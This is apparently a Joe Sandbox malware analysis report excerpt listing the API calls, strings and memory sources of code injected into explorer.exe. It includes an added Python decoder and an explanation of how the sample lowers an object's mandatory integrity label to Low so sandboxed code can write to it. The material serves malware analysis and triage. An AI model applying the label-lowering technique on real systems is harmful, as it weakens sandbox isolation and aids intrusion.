                          • Instruction Fuzzy Hash: CE11DB72208A8582E7149F54F49578BBBB0F7C5798F60002AE78947A68DFBDC549CF40
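                           The function above converts the SDDL string S:(ML;;NW;;;LW) into a security descriptor, extracts its SACL and writes it back with SetNamedSecurityInfoW, i.e. it stamps a Low mandatory integrity label with the no-write-up policy onto a named object (the target path is not visible in this listing). Because an object with no label is treated as Medium with no-write-up, this is what makes the object writable from Low-integrity code such as a sandboxed browser renderer. The following Python is an added example, not code from this report or from the analysed sample; it decodes that SDDL string and shows the integrity check it changes. Everything except the SDDL string itself (the alias tables, the implicit-Medium default and the write-check helper) is general Windows integrity-mechanism behaviour, not something this page states.

```python
"""Decode the mandatory-label ACE that the sample applies via SetNamedSecurityInfoW.

Added example, not code from the Joe Sandbox report or from the analysed
sample. The only input taken from the report is the SDDL string
"S:(ML;;NW;;;LW)". Only the SACL (S:) section and its ML ACEs are decoded;
DACL entries are ignored, and the write check below models the mandatory
integrity policy only, not the discretionary ACL.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

SAMPLE_SDDL = "S:(ML;;NW;;;LW)"  # string observed in the report

# Integrity-level SID aliases accepted by ConvertStringSecurityDescriptorToSecurityDescriptorW.
LABEL_SIDS: Dict[str, str] = {
    "LW": "S-1-16-4096",   # Low
    "ME": "S-1-16-8192",   # Medium
    "MP": "S-1-16-8448",   # Medium Plus
    "HI": "S-1-16-12288",  # High
    "SI": "S-1-16-16384",  # System
}
LEVEL_NAMES: Dict[int, str] = {4096: "Low", 8192: "Medium", 8448: "Medium Plus",
                               12288: "High", 16384: "System"}
# Mandatory-label policy tokens (SYSTEM_MANDATORY_LABEL_NO_*_UP).
LABEL_RIGHTS: Dict[str, str] = {"NW": "no-write-up", "NR": "no-read-up", "NX": "no-execute-up"}

_ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass
class MandatoryLabel:
    sid: str           # S-1-16-<rid>
    rid: int           # integrity level as a number, e.g. 4096 for Low
    name: str          # Low / Medium / ... or "custom" for a non-standard RID
    policy: List[str]  # decoded NW / NR / NX tokens


def _sections(sddl: str) -> Dict[str, str]:
    """Split an SDDL string into its O:/G:/D:/S: sections (ACE fields never contain ':')."""
    out: Dict[str, str] = {}
    for part in re.split(r"(?=[OGDS]:)", sddl):
        if part:
            out[part[0]] = part[2:]
    return out


def parse_mandatory_labels(sddl: str) -> List[MandatoryLabel]:
    """Return every ML (SYSTEM_MANDATORY_LABEL) ACE found in the SACL of `sddl`."""
    labels: List[MandatoryLabel] = []
    for ace in _ACE_RE.findall(_sections(sddl).get("S", "")):
        fields = ace.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: ({ace})")
        ace_type, _flags, rights, _obj_guid, _inh_guid, sid = fields[:6]
        if ace_type != "ML":
            continue  # audit/alarm ACEs in the SACL are not labels
        sid = LABEL_SIDS.get(sid, sid)  # alias -> S-1-16-N; raw SIDs pass through
        if not sid.startswith("S-1-16-"):
            raise ValueError(f"ML ACE with non-label SID {sid}")
        rid = int(sid.rsplit("-", 1)[1])
        policy: List[str] = []
        for i in range(0, len(rights), 2):  # rights are concatenated two-letter tokens
            token = rights[i:i + 2]
            if token not in LABEL_RIGHTS:
                raise ValueError(f"unknown mandatory-label right {token!r}")
            policy.append(LABEL_RIGHTS[token])
        labels.append(MandatoryLabel(sid, rid, LEVEL_NAMES.get(rid, "custom"), policy))
    return labels


def write_allowed_by_label(sddl: str, process_level: str) -> bool:
    """Mandatory-integrity part of an access check for a write from `process_level`.

    An object without an ML ACE carries the implicit Medium label with
    no-write-up, which is why Low-integrity code normally cannot write to it.
    Relabelling the object Low (as the sample does) removes that barrier.
    """
    labels = parse_mandatory_labels(sddl)
    label_rid, policy = (8192, ["no-write-up"]) if not labels else (labels[0].rid, labels[0].policy)
    proc_rid = {name: rid for rid, name in LEVEL_NAMES.items()}[process_level]
    return not ("no-write-up" in policy and proc_rid < label_rid)


def describe(sddl: str) -> str:
    """One-line reading of the label for an analyst's notes."""
    labels = parse_mandatory_labels(sddl)
    if not labels:
        return "no mandatory label (implicit Medium, no-write-up)"
    lbl = labels[0]
    return f"{lbl.name} mandatory label ({lbl.sid}) with policy {'+'.join(lbl.policy)}"


if __name__ == "__main__":
    print(describe(SAMPLE_SDDL))
    for level in ("Low", "Medium"):
        print(f"{level}-integrity process may write: {write_allowed_by_label(SAMPLE_SDDL, level)}")
```

                           On a live host the same label is visible with `icacls <path>`, which prints a `Mandatory Label\Low Mandatory Level:(NW)` line for objects relabelled this way; user-writable directories carrying a Low label are worth flagging during triage, since legitimate software rarely lowers the label on its own files.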
                          APIs
                          • GetSystemDirectoryW.KERNEL32 ref: 011A218F
                          • GetVolumeInformationW.KERNEL32 ref: 011A21E0
                            • Part of subcall function 011ADC00: CryptAcquireContextW.ADVAPI32 ref: 011ADC4E
                            • Part of subcall function 011ADC00: CryptCreateHash.ADVAPI32 ref: 011ADC77
                            • Part of subcall function 011ADC00: WaitForSingleObject.KERNEL32 ref: 011ADCE5
                            • Part of subcall function 011ADC00: CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                            • Part of subcall function 011ADC00: CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextHash$AcquireCreateDestroyDirectoryInformationObjectReleaseSingleSystemVolumeWait
                          • String ID:
                          • API String ID: 2609862481-0
                          • Opcode ID: a35bb54f1f73ba14eb1c2990bdd3d20f108409ba1b821c1f3c15cf64e819ed8e
                          • Instruction ID: ccec57cb24b47b6e8ecedf8e606d039379fdc57e857bdbb550e51d0ff4158e19
                          • Opcode Fuzzy Hash: a35bb54f1f73ba14eb1c2990bdd3d20f108409ba1b821c1f3c15cf64e819ed8e
                          • Instruction Fuzzy Hash: B1119236228AC082E728CB64F88879B77A1F784744FA04026E789C7E58DB7EC449CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcWindow
                          • String ID:
                          • API String ID: 181713994-0
                          • Opcode ID: 31c9c0b5947c44be4f1d2d09d6ca79a6a5646e6c6c14db69b613b66a64f539fd
                          • Instruction ID: 3b586f04c2f5809efc5c182ad01ee7d3b2b2e54f3698ca01294638291bef8968
                          • Opcode Fuzzy Hash: 31c9c0b5947c44be4f1d2d09d6ca79a6a5646e6c6c14db69b613b66a64f539fd
                          • Instruction Fuzzy Hash: 5C0121B910C680CBD73CAB5CE01435ABF60F3C5749F804526E78942A98CB7FC6848F42
                          APIs
                          • GetProcAddressForCaller.KERNELBASE ref: 011A99FF
                          • GetProcAddress.KERNEL32 ref: 011A9A5E
                          • LoadLibraryExW.KERNEL32 ref: 011A9AA8
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CallerLibraryLoad
                          • String ID:
                          • API String ID: 3311809864-0
                          • Opcode ID: 100a539388ed10e765e593ae9632a672f362217d4cd857549dcdeec64cc44426
                          • Instruction ID: 404537cda561d50d6dd5edc36a6a77fd249a0677ffb152cf6f48c97e703e1d89
                          • Opcode Fuzzy Hash: 100a539388ed10e765e593ae9632a672f362217d4cd857549dcdeec64cc44426
                          • Instruction Fuzzy Hash: A101A53AB18BC985DB34CB08E0907AAB760F3C6744F804516D68E42A68DB7DD555CB42
                          APIs
                          • GetProcAddressForCaller.KERNELBASE ref: 011A8DBC
                          • GetProcAddress.KERNEL32 ref: 011A8E1E
                          • LoadLibraryW.KERNEL32 ref: 011A8E68
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CallerLibraryLoad
                          • String ID:
                          • API String ID: 3311809864-0
                          • Opcode ID: f12bac732cab75a28ea2f441fae935218d77663a432a707c6d2a7bcdaf3ad6d8
                          • Instruction ID: 35c97d0c271daf910e677e0915a2214113bbcf2f69f589ac3b7b86de9c000c83
                          • Opcode Fuzzy Hash: f12bac732cab75a28ea2f441fae935218d77663a432a707c6d2a7bcdaf3ad6d8
                          • Instruction Fuzzy Hash: 1101C43A618BC5CADB35CB08E4D43AAB764F3D5745F800116C68E83B68DF39C559CB41
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 58f56a68dde3867d7acb8a7956f5aa7bba3c9146910bc749bbf72c40a0543847
                          • Instruction ID: 99598631d4243720f5907f22f91b3097985791073a199fd87f462ac41a840a6e
                          • Opcode Fuzzy Hash: 58f56a68dde3867d7acb8a7956f5aa7bba3c9146910bc749bbf72c40a0543847
                          • Instruction Fuzzy Hash: 2BF0C03550974585F72CEB64F8197D13A90F344328F84522BD649957B4EB7E8289CA01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: b32d8231ed20fe3a6c646cd57c97a2d13eb4c555140a907c0ff916a62f50b3f8
                          • Instruction ID: 85652bc8cdd6fcb9e8efdfc7b167fc1d42df18dbed5238d5b050f4fc85af6b58
                          • Opcode Fuzzy Hash: b32d8231ed20fe3a6c646cd57c97a2d13eb4c555140a907c0ff916a62f50b3f8
                          • Instruction Fuzzy Hash: C6F04831D08745C5FBADDB60F8283D527A2F35434CF50116BF655596A0CBFD8185C741
                          APIs
                          • setsockopt.WS2_32 ref: 0119AB8A
                          • SetEvent.KERNEL32 ref: 0119ABFF
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                          • wnsprintfW.SHLWAPI ref: 0119AC32
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119AC50
                          • wnsprintfW.SHLWAPI ref: 0119AC83
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119ACA1
                          • wnsprintfW.SHLWAPI ref: 0119ACD4
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119ACF2
                          • wnsprintfW.SHLWAPI ref: 0119AD25
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119AD43
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F390
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3A6
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3B1
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F3D3
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3E9
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3F4
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01194277), ref: 011A05CB
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A05EF
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A0625
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0630
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A063B
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A0652
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A066A
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A06B2
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A06FD
                            • Part of subcall function 011A05B0: RemoveDirectoryW.KERNEL32 ref: 011A0708
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A0713
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A071E
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0729
                            • Part of subcall function 0119FD90: CoInitializeEx.COMBASE ref: 0119FDC0
                            • Part of subcall function 0119FD90: CoUninitialize.COMBASE ref: 011A01C3
                            • Part of subcall function 011A0330: OpenEventW.KERNEL32 ref: 011A0351
                            • Part of subcall function 011A0330: SetEvent.KERNEL32 ref: 011A0372
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A0380
                            • Part of subcall function 011A0330: OpenMutexW.KERNEL32 ref: 011A03A0
                            • Part of subcall function 011A0330: WaitForSingleObject.KERNEL32 ref: 011A03C6
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A03D4
                            • Part of subcall function 011A0330: SHGetKnownFolderPath.SHELL32 ref: 011A03EE
                            • Part of subcall function 011A0330: LocalAlloc.KERNEL32 ref: 011A0406
                            • Part of subcall function 011A0330: lstrlenW.KERNEL32 ref: 011A0467
                            • Part of subcall function 011A0330: GetFileAttributesW.KERNEL32 ref: 011A04F3
                            • Part of subcall function 011A0330: LocalFree.KERNEL32 ref: 011A0543
                            • Part of subcall function 011A0330: CoTaskMemFree.COMBASE ref: 011A0551
                            • Part of subcall function 011A0330: wnsprintfW.SHLWAPI ref: 011A057E
                            • Part of subcall function 011A0330: RegDeleteKeyExW.ADVAPI32 ref: 011A0596
                            • Part of subcall function 011A01E0: SHGetKnownFolderPath.SHELL32 ref: 011A01F8
                            • Part of subcall function 011A01E0: LocalAlloc.KERNEL32 ref: 011A0210
                            • Part of subcall function 011A01E0: lstrlenW.KERNEL32 ref: 011A0262
                            • Part of subcall function 011A01E0: GetFileAttributesW.KERNEL32 ref: 011A02CA
                            • Part of subcall function 011A01E0: LocalFree.KERNEL32 ref: 011A030B
                            • Part of subcall function 011A01E0: CoTaskMemFree.COMBASE ref: 011A0316
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                          • GetFileAttributesW.KERNEL32 ref: 0119AE29
                          • SHFileOperationW.SHELL32 ref: 0119AE48
                          • LocalFree.KERNEL32 ref: 0119AE79
                          • GetWindowsDirectoryW.KERNEL32 ref: 0119AF37
                          • CreateProcessW.KERNEL32 ref: 0119B00A
                          • GetCurrentProcess.KERNEL32 ref: 0119B019
                          • DuplicateHandle.KERNEL32 ref: 0119B06B
                          • GetCurrentProcess.KERNEL32 ref: 0119B07A
                          • DuplicateHandle.KERNEL32 ref: 0119B0CB
                          • LoadLibraryW.KERNEL32 ref: 0119B0E2
                          • GetProcAddress.KERNEL32 ref: 0119B120
                          • GetProcAddress.KERNEL32 ref: 0119B13E
                          • lstrcpyW.KERNEL32 ref: 0119B15C
                          • lstrcpyA.KERNEL32 ref: 0119B172
                          • lstrcpyA.KERNEL32 ref: 0119B188
                          • lstrcpyA.KERNEL32 ref: 0119B19E
                          • lstrcpyA.KERNEL32 ref: 0119B1B4
                          • lstrcpyA.KERNEL32 ref: 0119B1CA
                          • lstrcpyA.KERNEL32 ref: 0119B1DD
                          • lstrcpyW.KERNEL32 ref: 0119B1F3
                          • lstrcpyW.KERNEL32 ref: 0119B209
                          • LocalFree.KERNEL32 ref: 0119B2D2
                          • CloseHandle.KERNEL32 ref: 0119B2F7
                          • CloseHandle.KERNEL32 ref: 0119B305
                          • TerminateProcess.KERNEL32 ref: 0119B31F
                          • LocalFree.KERNEL32 ref: 0119B32D
                          • OpenEventW.KERNEL32 ref: 0119B341
                          • SetEvent.KERNEL32 ref: 0119B362
                          • CloseHandle.KERNEL32 ref: 0119B370
                          • shutdown.WS2_32 ref: 0119B383
                          • closesocket.WS2_32 ref: 0119B391
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Deletelstrcpy$CloseHandle$AllocFilewnsprintf$EventFolderKnownOpenPathTask$Processlstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindowsclosesocketsetsockoptshutdown
                          • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$Spotify.exe$h${2046C745-B848-47EE-8068-B039EAC15A1C}${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 1118244034-3169802617
                          • Opcode ID: 7037301a7e069a12b47916f7d44cc6767f50f69d42ba6e202ef66847cf1e683c
                          • Instruction ID: bb698933e1a80d60b235713ed5014262e00f3f9491596e6ee7b065434aa4f9b1
                          • Opcode Fuzzy Hash: 7037301a7e069a12b47916f7d44cc6767f50f69d42ba6e202ef66847cf1e683c
                          • Instruction Fuzzy Hash: 1242F236218BC595DB75DB14F8983DAB3A5F788759F800126DA8D83B68EF3CC249CB40
                          APIs
                          • WaitForSingleObject.KERNEL32 ref: 0119E085
                          • GetLocalTime.KERNEL32 ref: 0119E0B4
                          • SystemTimeToFileTime.KERNEL32 ref: 0119E0CA
                          • wnsprintfW.SHLWAPI ref: 0119E14B
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E169
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                          • wnsprintfW.SHLWAPI ref: 0119E19C
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E1BA
                          • wnsprintfW.SHLWAPI ref: 0119E1ED
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E20B
                          • wnsprintfW.SHLWAPI ref: 0119E23E
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E25C
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F390
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3A6
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3B1
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F3D3
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3E9
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3F4
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01194277), ref: 011A05CB
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A05EF
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A0625
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0630
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A063B
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A0652
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A066A
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A06B2
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A06FD
                            • Part of subcall function 011A05B0: RemoveDirectoryW.KERNEL32 ref: 011A0708
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A0713
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A071E
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0729
                            • Part of subcall function 011A0330: OpenEventW.KERNEL32 ref: 011A0351
                            • Part of subcall function 011A0330: SetEvent.KERNEL32 ref: 011A0372
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A0380
                            • Part of subcall function 011A0330: OpenMutexW.KERNEL32 ref: 011A03A0
                            • Part of subcall function 011A0330: WaitForSingleObject.KERNEL32 ref: 011A03C6
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A03D4
                            • Part of subcall function 011A0330: SHGetKnownFolderPath.SHELL32 ref: 011A03EE
                            • Part of subcall function 011A0330: LocalAlloc.KERNEL32 ref: 011A0406
                            • Part of subcall function 011A0330: lstrlenW.KERNEL32 ref: 011A0467
                            • Part of subcall function 011A0330: GetFileAttributesW.KERNEL32 ref: 011A04F3
                            • Part of subcall function 011A0330: LocalFree.KERNEL32 ref: 011A0543
                            • Part of subcall function 011A0330: CoTaskMemFree.COMBASE ref: 011A0551
                            • Part of subcall function 011A0330: wnsprintfW.SHLWAPI ref: 011A057E
                            • Part of subcall function 011A0330: RegDeleteKeyExW.ADVAPI32 ref: 011A0596
                            • Part of subcall function 011A01E0: SHGetKnownFolderPath.SHELL32 ref: 011A01F8
                            • Part of subcall function 011A01E0: LocalAlloc.KERNEL32 ref: 011A0210
                            • Part of subcall function 011A01E0: lstrlenW.KERNEL32 ref: 011A0262
                            • Part of subcall function 011A01E0: GetFileAttributesW.KERNEL32 ref: 011A02CA
                            • Part of subcall function 011A01E0: LocalFree.KERNEL32 ref: 011A030B
                            • Part of subcall function 011A01E0: CoTaskMemFree.COMBASE ref: 011A0316
                            • Part of subcall function 0119FD90: CoInitializeEx.COMBASE ref: 0119FDC0
                            • Part of subcall function 0119FD90: CoUninitialize.COMBASE ref: 011A01C3
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                          • GetFileAttributesW.KERNEL32 ref: 0119E342
                          • SHFileOperationW.SHELL32 ref: 0119E361
                          • LocalFree.KERNEL32 ref: 0119E392
                          • GetWindowsDirectoryW.KERNEL32 ref: 0119E450
                          • CreateProcessW.KERNEL32 ref: 0119E523
                          • GetCurrentProcess.KERNEL32 ref: 0119E532
                          • DuplicateHandle.KERNEL32 ref: 0119E584
                          • GetCurrentProcess.KERNEL32 ref: 0119E593
                          • DuplicateHandle.KERNEL32 ref: 0119E5E4
                          • LoadLibraryW.KERNEL32 ref: 0119E5FB
                          • GetProcAddress.KERNEL32 ref: 0119E639
                          • GetProcAddress.KERNEL32 ref: 0119E657
                          • lstrcpyW.KERNEL32 ref: 0119E675
                          • lstrcpyA.KERNEL32 ref: 0119E68B
                          • lstrcpyA.KERNEL32 ref: 0119E6A1
                          • lstrcpyA.KERNEL32 ref: 0119E6B7
                          • lstrcpyA.KERNEL32 ref: 0119E6CD
                          • lstrcpyA.KERNEL32 ref: 0119E6E3
